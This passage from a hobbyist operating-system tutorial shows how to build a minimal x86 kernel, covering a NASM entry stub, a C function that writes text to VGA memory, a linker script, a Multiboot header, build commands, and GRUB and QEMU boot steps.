Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code

Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not mandatorily required in our example, however is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can awake the CPU from an hltinstruction. So we disable interrupts beforehand using cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loops clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each line contain 80 ascii characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have look at the next line .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x1000000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then values of location-counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader; called as Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes.

Further, This Multiboot header must contain 3 fields that are 4 byte aligned namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ’-c ’ option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:

image

That’s your kernel!!

 

PS:

* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking. * To run this on grub2 which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel